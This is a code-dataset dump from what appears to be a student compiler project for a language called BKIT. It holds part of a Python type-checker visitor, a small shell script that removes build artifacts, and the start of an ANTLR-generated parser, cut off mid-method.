TypeMismatchInExpression(ast)\n if isinstance(lhs.mtype.restype, Unknown):\n lhs.mtype.restype = rhs.mtype.eletype\n if isinstance(rhs.mtype.eletype):\n rhs.mtype.eletype = lhs.mtype.restype\n if isinstance(lhs.mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.restype) != type(rhs.mtype.eletype):\n raise TypeMismatchInStatement(ast)\n \n # ARRAY = ARRAY\n if isinstance(lhs.mtype, ArrayType) and isinstance(rhs.mtype, ArrayType):\n if isinstance(ast.lhs, Id) and not isinstance(ast.rhs, Id):\n raise TypeMismatchInStatement(ast)\n if not isinstance(ast.lhs, Id) and isinstance(ast.rhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(lhs.mtype.eletype, Unknown):\n lhs.mtype.eletype = rhs.mtype.eletype\n if isinstance(rhs.mtype.eletype, Unknown):\n rhs.mtype.eletype = lhs.mtype.eletype\n if isinstance(rhs.mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(rhs.mtype.eletype) != type(lhs.mtype.eletype):\n raise TypeMismatchInStatement(ast)\n \n # PRIM = ARRAY\n if isinstance(lhs.mtype, (Prim, Unknown)) and isinstance(rhs.mtype, ArrayType):\n if isinstance(ast.rhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(lhs.mtype, Unknown):\n lhs.mtype = rhs.mtype.eletype\n if isinstance(rhs.mtype.eletype, Unknown):\n rhs.mtype.eletype = lhs.mtype\n if isinstance(lhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype) != type(rhs.mtype.eletype):\n raise TypeMismatchInStatement(ast)\n \n # MTYPE = PRIM\n if isinstance(lhs.mtype, MType) and isinstance(rhs.mtype, (Prim, Unknown)):\n if isinstance(lhs.mtype.restype, VoidType):\n raise TypeMismatchInExpression(ast)\n if isinstance(lhs.mtype.restype, Unknown):\n lhs.mtype.restype = rhs.mtype\n if isinstance(rhs.mtype, Unknown):\n rhs.mtype = lhs.mtype.restype\n if isinstance(rhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.restype) != type(rhs.mtype):\n raise TypeMismatchInStatement(ast)\n \n # ARRAY = PRIM\n if 
isinstance(lhs.mtype, ArrayType) and isinstance(rhs.mtype, (Prim, Unknown)):\n if isinstance(ast.lhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(lhs.mtype.eletype, Unknown):\n lhs.mtype.eletype = rhs.mtype\n if isinstance(rhs.mtype, Unknown):\n rhs.mtype = lhs.mtype.eletype\n if isinstance(rhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.eletype) != type(rhs.mtype):\n raise TypeMismatchInStatement(ast)\n \n # PRIM = PRIM\n if isinstance(lhs.mtype, (Prim, Unknown)) and isinstance(rhs.mtype, (Prim, Unknown)):\n if isinstance(lhs.mtype, Unknown):\n lhs.mtype = rhs.mtype\n if isinstance(rhs.mtype, Unknown):\n rhs.mtype = lhs.mtype\n if isinstance(lhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(rhs.mtype) != type(lhs.mtype):\n raise TypeMismatchInStatement(ast)\n \n return None\n\n def visitIf(self, ast, env):\n \"\"\"\n scope_type statement\n \"\"\"\n return_type = None\n for idx in range(len(ast.ifthenStmt)):\n con_expr = self.visit(ast.ifthenStmt[idx][0], env) # if condition\n con_val = None\n if con_expr is None:\n if isinstance(ast.ifthenStmt[idx][0], Id):\n raise Undeclared(Identifier(), ast.ifthenStmt[idx][0].name)\n # for call_expr and call_stmt: it raise exception when visit call_\n # so we do not need to handle it here\n\n if isinstance(con_expr.mtype, (Prim, Unknown)):\n if isinstance(con_expr.mtype, Unknown):\n con_expr.mtype = BoolType()\n con_val = con_expr.mtype\n\n if isinstance(con_expr.mtype, ArrayType):\n if isinstance(con_expr.mtype.eletype, Unknown):\n con_expr.mtype.eletype = BoolType()\n con_val = con_expr.mtype.eletype\n \n if isinstance(con_expr.mtype, MType):\n if isinstance(con_expr.mtype.restype, Unknown):\n con_expr.mtype.restype = BoolType()\n con_val = con_expr.mtype.restype\n\n if not isinstance(con_val, BoolType):\n raise TypeMismatchInStatement(ast)\n \n scope = reduce(lambda y, x: [self.visit(x, y)] + y, ast.ifthenStmt[idx][1], []) \n if_env = scope + env\n # res_list = 
[self.visit(stmt, if_env) for stmt in ast.ifthenStmt[0][2]]\n res_type_list = []\n for stmt in ast.ifthenStmt[idx][2]:\n try:\n typ = self.visit(stmt, if_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n env = if_env[len(scope):]\n for res in res_type_list:\n if res:\n return_type = res\n if len(ast.elseStmt):\n print('come here')\n scope = reduce(lambda env, x: env + [self.visit(x, env)], ast.elseStmt[0], [])\n else_env = env + scope\n # res_list = [self.visit(stmt, else_env) for stmt in ast.elseStmt[1]]\n for stmt in ast.elseStmt[1]:\n try:\n typ = self.visit(stmt, else_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n for res in res_type_list:\n if res:\n return_type = res\n env = else_env[len(scope):]\n return return_type\n\n def visitFor(self, ast, env):\n \"\"\"\n Check if all has the same type as spec\n \"\"\"\n idx1 = self.visit(ast.idx1, env)\n idx1_val = None\n if idx1 is None:\n raise Undeclared(Identifier(), ast.idx1.name)\n if isinstance(idx1.mtype, (Prim, Unknown)):\n if isinstance(idx1.mtype, Unknown):\n idx1.mtype = IntType()\n idx1_val = idx1.mtype\n if isinstance(idx1.mtype, ArrayType):\n if isinstance(idx1.mtype.eletype, Unknown):\n idx1.mtype.eletype = IntType()\n idx1_val = idx1.mtype.eletype\n if isinstance(idx1.mtype, MType):\n if isinstance(idx1.mtype.restype, Unknown):\n idx1.mtype.restype = IntType()\n idx1_val = idx1.mtype.restype\n if not isinstance(idx1_val, IntType):\n raise TypeMismatchInStatement(ast)\n\n init_expr = self.visit(ast.expr1, env)\n init_val = None\n if init_expr is None:\n raise Undeclared(Identifier(), ast.expr1.name)\n if isinstance(init_expr.mtype, (Prim, Unknown)):\n if isinstance(init_expr.mtype, 
Unknown):\n init_expr.mtype = IntType()\n init_val = init_expr.mtype\n if isinstance(init_expr.mtype, ArrayType):\n if isinstance(init_expr.mtype.eletype, Unknown):\n init_expr.mtype.eletype = IntType()\n init_val = init_expr.mtype.eletype\n if isinstance(init_expr.mtype, MType):\n if isinstance(init_expr.mtype.restype, Unknown):\n init_expr.mtype.restype = IntType()\n init_val = init_expr.mtype.restype\n if not isinstance(init_val, IntType):\n raise TypeMismatchInStatement(ast)\n\n con_expr = self.visit(ast.expr2, env)\n con_val = None\n if con_expr is None:\n raise Undeclared(Identifier(), ast.expr2.name)\n if isinstance(con_expr.mtype, (Prim, Unknown)):\n if isinstance(con_expr.mtype, Unknown):\n con_expr.mtype = BoolType()\n con_val = con_expr.mtype\n if isinstance(con_expr.mtype, ArrayType):\n if isinstance(con_expr.mtype.eletype, Unknown):\n con_expr.mtype.eletype = BoolType()\n con_val = con_expr.mtype.eletype\n if isinstance(con_expr.mtype, MType):\n if isinstance(con_expr.mtype.restype, Unknown):\n con_expr.mtype.restype = BoolType()\n con_val = con_expr.mtype.restype\n if not isinstance(con_val, BoolType):\n raise TypeMismatchInStatement(ast)\n \n update_expr = self.visit(ast.expr3, env)\n update_val = None\n if update_expr is None:\n raise Undeclared(Identifier(), ast.expr1.name)\n if isinstance(update_expr.mtype, (Prim, Unknown)):\n if isinstance(update_expr.mtype, Unknown):\n update_expr.mtype = IntType()\n update_val = update_expr.mtype\n if isinstance(update_expr.mtype, ArrayType):\n if isinstance(update_expr.mtype.eletype, Unknown):\n update_expr.mtype.eletype = IntType()\n update_val = update_expr.mtype.eletype\n if isinstance(update_expr.mtype, MType):\n if isinstance(update_expr.mtype.restype, Unknown):\n update_expr.mtype.restype = IntType()\n update_val = update_expr.mtype.restype\n if not isinstance(update_val, IntType):\n raise TypeMismatchInStatement(ast)\n\n scope = reduce(lambda env, x: [self.visit(x, env)] + env, ast.loop[0], [])\n 
cur_env = scope + env\n res_type_list = []\n for stmt in ast.loop[1]:\n try:\n typ = self.visit(stmt, cur_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n\n env = cur_env[len(scope) :]\n for res in res_type_list:\n if res:\n return res\n return None\n \n def visitBreak(self, ast, env):\n \"\"\"\n Do not care about unreachablestmt\n \"\"\"\n return None\n\n def visitReturn(self, ast, env):\n \"\"\"\n TODO: check the type of this return stmt and the type of function return\n return type has the type if None we handled in FuncDecl\n \"\"\"\n if ast.expr:\n res = self.visit(ast.expr, env)\n if res == None:\n raise Undeclared(Variable(), ast.expr.name)\n if isinstance(res.mtype, (Prim, Unknown)):\n if isinstance(res.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n else:\n return res\n if isinstance(res.mtype, ArrayType):\n if isinstance(res.mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n else:\n return res\n if isinstance(res.mtype, MType):\n if isinstance(res.mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n else:\n return res\n else:\n return Symbol('', VoidType())\n\n def visitDowhile(self, ast, env):\n \"\"\"\n Do stmt before\n \"\"\"\n scope = reduce(lambda env, x: [self.visit(x, env)] + env, ast.sl[0], [])\n cur_env = scope + env\n\n res_type_list = []\n for stmt in ast.sl[1]:\n try:\n typ = self.visit(stmt, cur_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n\n expr = self.visit(ast.exp, env)\n expr_val = None\n if expr is None:\n raise Undeclared(Identifier(), ast.exp.name)\n if isinstance(expr.mtype, (Prim, Unknown)):\n if isinstance(expr.mtype, Unknown):\n expr.mtype = BoolType()\n expr_val = expr.mtype\n if 
isinstance(expr.mtype, ArrayType):\n if isinstance(expr.mtype.eletype, Unknown):\n expr.mtype.eletype = BoolType()\n expr_val = expr.mtype.eletype\n if isinstance(expr.mtype, MType):\n if isinstance(expr.mtype.restype, Unknown):\n expr.mtype.restype = BoolType()\n expr_val = expr.mtype.restype\n if not isinstance(expr_val, BoolType):\n raise TypeMismatchInStatement(ast)\n \n env = cur_env[len(scope) :]\n for res in res_type_list:\n if res:\n return res\n return None\n \n\n def visitWhile(self, ast, env):\n \"\"\"\n Same with Dowhile?\n \"\"\"\n expr = self.visit(ast.exp, env)\n expr_val = None\n if expr is None:\n raise Undeclared(Identifier(), ast.exp.name)\n if isinstance(expr.mtype, (Prim, Unknown)):\n if isinstance(expr.mtype, Unknown):\n expr.mtype = BoolType()\n expr_val = expr.mtype\n if isinstance(expr.mtype, ArrayType):\n if isinstance(expr.mtype.eletype, Unknown):\n expr.mtype.eletype = BoolType()\n expr_val = expr.mtype.eletype\n if isinstance(expr.mtype, MType):\n if isinstance(expr.mtype.restype, Unknown):\n expr.mtype.restype = BoolType()\n expr_val = expr.mtype.restype\n if not isinstance(expr_val, BoolType):\n raise TypeMismatchInStatement(ast)\n\n scope = reduce(lambda env, x: [self.visit(x, env)] + env, ast.sl[0], [])\n cur_env = scope + env\n # res_list = []\n # for stmt in ast.sl[1]:\n # try:\n # res_list += [self.visit(stmt, cur_env)]\n # except TypeCannotBeInferred:\n # raise TypeCannotBeInferred(stmt)\n \n res_type_list = []\n for stmt in ast.sl[1]:\n try:\n typ = self.visit(stmt, cur_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n\n env = cur_env[len(scope) :]\n for res in res_type_list:\n if res:\n return res\n return None\n\n def visitCallStmt(self, ast, env):\n \"\"\"\n Callee must have the VoidType as its return type\n \"\"\"\n func = self.visit(ast.method, env)\n if func is 
None or not isinstance(func.mtype, MType):\n raise Undeclared(Function(), ast.method.name)\n if not func.mtype.restype:\n func.mtype.restype = VoidType()\n if not isinstance(func.mtype.restype, VoidType):\n raise TypeMismatchInStatement(ast)\n if len(func.mtype.intype) != len(ast.param):\n raise TypeMismatchInStatement(ast)\n\n # args = [self.visit(arg, env) for arg in ast.param]\n for (idx, arg) in enumerate(ast.param):\n arg_sym = self.visit(arg, env) # arg_type: Symbol\n arg_type = Unknown()\n is_arr = False\n if isinstance(arg_sym.mtype, (Prim, Unknown)):\n arg_type = arg_sym.mtype\n if isinstance(arg_sym.mtype, MType):\n arg_type = arg_sym.mtype.restype\n if isinstance(arg_sym.mtype, ArrayType):\n arg_type = arg_sym.mtype.eletype\n is_arr = True\n\n if isinstance(arg_type, Unknown):\n if func.mtype.intype[idx] == None:\n raise TypeCannotBeInferred(ast)\n if isinstance(func.mtype.intype[idx].mtype, (Unknown, Prim)):\n if isinstance(func.mtype.intype[idx].mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype\n if isinstance(func.mtype.intype[idx].mtype, MType):\n if isinstance(func.mtype.intype[idx].mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype.restype\n if isinstance(func.mtype.intype[idx].mtype, ArrayType):\n if not is_arr:\n raise TypeMismatchInStatement(ast)\n if isinstance(func.mtype.intype[idx].mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype.eletype\n \n else: # arg_type is known\n if func.mtype.intype[idx] == None:\n func.mtype.intype[idx] = arg_sym\n if isinstance(func.mtype.intype[idx].mtype, (Unknown,Prim)):\n if isinstance(func.mtype.intype[idx].mtype, Unknown):\n func.mtype.intype[idx].mtype = arg_type\n if type(func.mtype.intype[idx].mtype) != type(arg_type):\n raise TypeMismatchInStatement(ast)\n if isinstance(func.mtype.intype[idx].mtype, MType):\n if isinstance(func.mtype.intype[idx].mtype.restype, 
Unknown):\n func.mtype.intype[idx].mtype.restype = arg_type\n if type(func.mtype.intype[idx].mtype.restype) != type(arg_type):\n raise TypeMismatchInStatement(ast)\n if isinstance(func.mtype.intype[idx].mtype, ArrayType):\n if not is_arr:\n raise TypeMismatchInStatement(ast)\n if isinstance(func.mtype.intype[idx].mtype.eletype, Unknown):\n func.mtype.intype[idx].mtype.eletype = arg_type\n if type(func.mtype.intype[idx].mtype.eletype) != type(arg_type):\n raise TypeMismatchInStatement(ast)\n if type(func.mtype.intype[idx]) != type(arg_sym):\n # array type not match\n raise TypeMismatchInStatement(ast)\n \n if isinstance(arg_sym.mtype, (Prim, Unknown)):\n arg_sym.mtype = arg_type\n if isinstance(arg_sym.mtype, MType):\n arg_sym.mtype.restype = arg_type\n if isinstance(arg_sym.mtype, ArrayType):\n arg_sym.mtype.eletype = arg_type\n\n return None\n\n def visitId(self, ast, c):\n \"\"\"\n return: Symbol(name=id.name, mtype=None)\n \"\"\"\n for sym in c:\n if sym.name == ast.name:\n return sym\n return None\n\n def is_same_type(self, a, b):\n # print(a.mtype)\n # print(b.mtype)\n if type(a.mtype) != type(b.mtype):\n return False\n else:\n if isinstance(a.mtype, ArrayType):\n if len(a.mtype.dimen) != len(b.mtype.dimen) or a.mtype.eletype != b.mtype.eletype:\n return False\n if isinstance(a.mtype, MType):\n if a.mtype.intype != b.mtype.intype or a.mtype.restype != b.mtype.restype:\n return False\n return True\n \n def visitGlobal(self,ast,c):\n if isinstance(ast, FuncDecl):\n for x in c:\n if x.name == ast.name.name:\n raise Redeclared(Function(), x.name)\n return Symbol(ast.name.name, MType([None]*len(ast.param), None))\n if isinstance(ast, VarDecl):\n for x in c:\n if x.name == ast.variable.name:\n raise Redeclared(Variable(), x.name)\n return Symbol(ast.variable.name, None)\n\n def update_scope(self, scope, var):\n \"\"\"\n stack-like\n \"\"\"\n return [var] + scope\n \"\"\"\n Rang comment them de co du 1000 dong\n \"\"\"\n" }, { "alpha_fraction": 0.6451612710952759, 
"alphanum_fraction": 0.6451612710952759, "avg_line_length": 19.66666603088379, "blob_id": "623dd8680b54b9d9814c4675784f6868fbc4c53e", "content_id": "0b2ea126ed2091ecc2773df0ef198e9302211bdc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 62, "license_type": "no_license", "max_line_length": 38, "num_lines": 3, "path": "/SyntaxAnalysis/clean.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "#!/bin/bash\nrm -f *.java *.interp *.tokens *.class\necho Clear\n" }, { "alpha_fraction": 0.49789363145828247, "alphanum_fraction": 0.5460183620452881, "avg_line_length": 32.23735427856445, "blob_id": "723453f0702cd2fcba117d7f93bed823ff2714f7", "content_id": "0d31739cb37a1a1b46a3264c6430f2f48bc16386", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34182, "license_type": "no_license", "max_line_length": 165, "num_lines": 1028, "path": "/SyntaxAnalysis/tut/src/forJava/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/tut/src/forJava/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\36\")\n buf.write(\"\\u008f\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\3\\2\\3\\2\\6\\2!\\n\\2\\r\\2\\16\\2\\\"\\3\\2\\3\\2\\3\")\n buf.write(\"\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\4\")\n 
buf.write(\"\\64\\n\\4\\f\\4\\16\\4\\67\\13\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\7\")\n buf.write(\"\\5@\\n\\5\\f\\5\\16\\5C\\13\\5\\3\\6\\3\\6\\3\\6\\5\\6H\\n\\6\\3\\7\\3\\7\\3\")\n buf.write(\"\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\b\\7\\bR\\n\\b\\f\\b\\16\\bU\\13\\b\\3\\b\\3\\b\")\n buf.write(\"\\3\\b\\3\\t\\3\\t\\3\\t\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\5\\nb\\n\\n\\3\\13\\3\\13\")\n buf.write(\"\\3\\13\\3\\13\\3\\13\\3\\13\\5\\13j\\n\\13\\3\\13\\3\\13\\3\\13\\7\\13o\\n\")\n buf.write(\"\\13\\f\\13\\16\\13r\\13\\13\\3\\f\\3\\f\\3\\f\\3\\f\\3\\f\\3\\f\\7\\fz\\n\\f\")\n buf.write(\"\\f\\f\\16\\f}\\13\\f\\3\\r\\3\\r\\3\\r\\3\\r\\5\\r\\u0083\\n\\r\\3\\16\\3\\16\")\n buf.write(\"\\3\\16\\7\\16\\u0088\\n\\16\\f\\16\\16\\16\\u008b\\13\\16\\3\\17\\3\\17\")\n buf.write(\"\\3\\17\\2\\4\\24\\26\\20\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\")\n buf.write(\"\\2\\3\\3\\2\\16\\17\\2\\u0090\\2 \\3\\2\\2\\2\\4&\\3\\2\\2\\2\\6*\\3\\2\\2\")\n buf.write(\"\\2\\bA\\3\\2\\2\\2\\nG\\3\\2\\2\\2\\fI\\3\\2\\2\\2\\16N\\3\\2\\2\\2\\20Y\\3\")\n buf.write(\"\\2\\2\\2\\22a\\3\\2\\2\\2\\24i\\3\\2\\2\\2\\26s\\3\\2\\2\\2\\30\\u0082\\3\")\n buf.write(\"\\2\\2\\2\\32\\u0084\\3\\2\\2\\2\\34\\u008c\\3\\2\\2\\2\\36!\\5\\4\\3\\2\\37\")\n buf.write(\"!\\5\\6\\4\\2 \\36\\3\\2\\2\\2 \\37\\3\\2\\2\\2!\\\"\\3\\2\\2\\2\\\" \\3\\2\\2\")\n buf.write(\"\\2\\\"#\\3\\2\\2\\2#$\\3\\2\\2\\2$%\\7\\2\\2\\3%\\3\\3\\2\\2\\2&\\'\\5\\34\\17\")\n buf.write(\"\\2\\'(\\5\\32\\16\\2()\\7\\34\\2\\2)\\5\\3\\2\\2\\2*+\\5\\34\\17\\2+,\\7\")\n buf.write(\"\\3\\2\\2,-\\7\\24\\2\\2-.\\5\\34\\17\\2.\\65\\5\\32\\16\\2/\\60\\7\\34\\2\")\n buf.write(\"\\2\\60\\61\\5\\34\\17\\2\\61\\62\\5\\32\\16\\2\\62\\64\\3\\2\\2\\2\\63/\\3\")\n buf.write(\"\\2\\2\\2\\64\\67\\3\\2\\2\\2\\65\\63\\3\\2\\2\\2\\65\\66\\3\\2\\2\\2\\668\\3\")\n buf.write(\"\\2\\2\\2\\67\\65\\3\\2\\2\\289\\7\\25\\2\\29:\\7\\30\\2\\2:;\\5\\b\\5\\2;\")\n buf.write(\"<\\7\\31\\2\\2<\\7\\3\\2\\2\\2=@\\5\\4\\3\\2>@\\5\\n\\6\\2?=\\3\\2\\2\\2?>\")\n 
buf.write(\"\\3\\2\\2\\2@C\\3\\2\\2\\2A?\\3\\2\\2\\2AB\\3\\2\\2\\2B\\t\\3\\2\\2\\2CA\\3\")\n buf.write(\"\\2\\2\\2DH\\5\\f\\7\\2EH\\5\\16\\b\\2FH\\5\\20\\t\\2GD\\3\\2\\2\\2GE\\3\\2\")\n buf.write(\"\\2\\2GF\\3\\2\\2\\2H\\13\\3\\2\\2\\2IJ\\7\\3\\2\\2JK\\7\\36\\2\\2KL\\5\\22\")\n buf.write(\"\\n\\2LM\\7\\34\\2\\2M\\r\\3\\2\\2\\2NO\\7\\3\\2\\2OS\\7\\24\\2\\2PR\\5\\32\")\n buf.write(\"\\16\\2QP\\3\\2\\2\\2RU\\3\\2\\2\\2SQ\\3\\2\\2\\2ST\\3\\2\\2\\2TV\\3\\2\\2\")\n buf.write(\"\\2US\\3\\2\\2\\2VW\\7\\25\\2\\2WX\\7\\34\\2\\2X\\17\\3\\2\\2\\2YZ\\7\\r\\2\")\n buf.write(\"\\2Z[\\5\\22\\n\\2[\\21\\3\\2\\2\\2\\\\]\\5\\24\\13\\2]^\\7\\20\\2\\2^_\\5\")\n buf.write(\"\\22\\n\\2_b\\3\\2\\2\\2`b\\5\\24\\13\\2a\\\\\\3\\2\\2\\2a`\\3\\2\\2\\2b\\23\")\n buf.write(\"\\3\\2\\2\\2cd\\b\\13\\1\\2de\\5\\26\\f\\2ef\\7\\21\\2\\2fg\\5\\24\\13\\5\")\n buf.write(\"gj\\3\\2\\2\\2hj\\5\\26\\f\\2ic\\3\\2\\2\\2ih\\3\\2\\2\\2jp\\3\\2\\2\\2kl\")\n buf.write(\"\\f\\4\\2\\2lm\\7\\22\\2\\2mo\\5\\26\\f\\2nk\\3\\2\\2\\2or\\3\\2\\2\\2pn\\3\")\n buf.write(\"\\2\\2\\2pq\\3\\2\\2\\2q\\25\\3\\2\\2\\2rp\\3\\2\\2\\2st\\b\\f\\1\\2tu\\5\\30\")\n buf.write(\"\\r\\2u{\\3\\2\\2\\2vw\\f\\4\\2\\2wx\\7\\23\\2\\2xz\\5\\26\\f\\5yv\\3\\2\\2\")\n buf.write(\"\\2z}\\3\\2\\2\\2{y\\3\\2\\2\\2{|\\3\\2\\2\\2|\\27\\3\\2\\2\\2}{\\3\\2\\2\\2\")\n buf.write(\"~\\u0083\\7\\n\\2\\2\\177\\u0083\\7\\13\\2\\2\\u0080\\u0083\\7\\3\\2\\2\")\n buf.write(\"\\u0081\\u0083\\5\\16\\b\\2\\u0082~\\3\\2\\2\\2\\u0082\\177\\3\\2\\2\\2\")\n buf.write(\"\\u0082\\u0080\\3\\2\\2\\2\\u0082\\u0081\\3\\2\\2\\2\\u0083\\31\\3\\2\")\n buf.write(\"\\2\\2\\u0084\\u0089\\7\\3\\2\\2\\u0085\\u0086\\7\\35\\2\\2\\u0086\\u0088\")\n buf.write(\"\\7\\3\\2\\2\\u0087\\u0085\\3\\2\\2\\2\\u0088\\u008b\\3\\2\\2\\2\\u0089\")\n buf.write(\"\\u0087\\3\\2\\2\\2\\u0089\\u008a\\3\\2\\2\\2\\u008a\\33\\3\\2\\2\\2\\u008b\")\n buf.write(\"\\u0089\\3\\2\\2\\2\\u008c\\u008d\\t\\2\\2\\2\\u008d\\35\\3\\2\\2\\2\\17\")\n buf.write(\" \\\"\\65?AGSaip{\\u0082\\u0089\")\n return 
buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"'return'\", \n \"'int'\", \"'float'\", \"'+'\", \"'-'\", \"'*'\", \"'/'\", \"'('\", \n \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \n \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \n \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \n \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \n \"STAR_INT\", \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_function_body = 3\n RULE_stmt = 4\n RULE_assign_stmt = 5\n RULE_call_stmt = 6\n RULE_ret_stmt = 7\n RULE_expr = 8\n RULE_expr1 = 9\n RULE_expr2 = 10\n RULE_operand = 11\n RULE_ids_list = 12\n RULE_primitive_type = 13\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"function_body\", \n \"stmt\", \"assign_stmt\", \"call_stmt\", \"ret_stmt\", \"expr\", \n \"expr1\", \"expr2\", \"operand\", \"ids_list\", \"primitive_type\" ]\n\n EOF = Token.EOF\n ID=1\n ILLEGAL_ESCAPE=2\n UNCLOSE_STRING=3\n COMMENT=4\n UNTERMINATED_COMMENT=5\n ERROR_CHAR=6\n WS=7\n Integer_literal=8\n Float_literal=9\n String_literal=10\n RETURN=11\n INT=12\n FLOAT=13\n PLUS_INT=14\n MINUS_INT=15\n STAR_INT=16\n DIV_INT=17\n LEFT_PAREN=18\n RIGHT_PAREN=19\n LEFT_BRACKET=20\n RIGHT_BRACKET=21\n 
LEFT_BRACE=22\n RIGHT_BRACE=23\n COLON=24\n DOT=25\n SEMI=26\n COMMA=27\n ASSIGN=28\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 30 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 30\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,0,self._ctx)\n if la_ == 1:\n self.state = 28\n self.var_declare()\n pass\n\n elif la_ == 2:\n self.state = 29\n self.function_declare()\n pass\n\n\n self.state = 32 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.INT or _la==BKITParser.FLOAT):\n break\n\n self.state = 34\n self.match(BKITParser.EOF)\n except 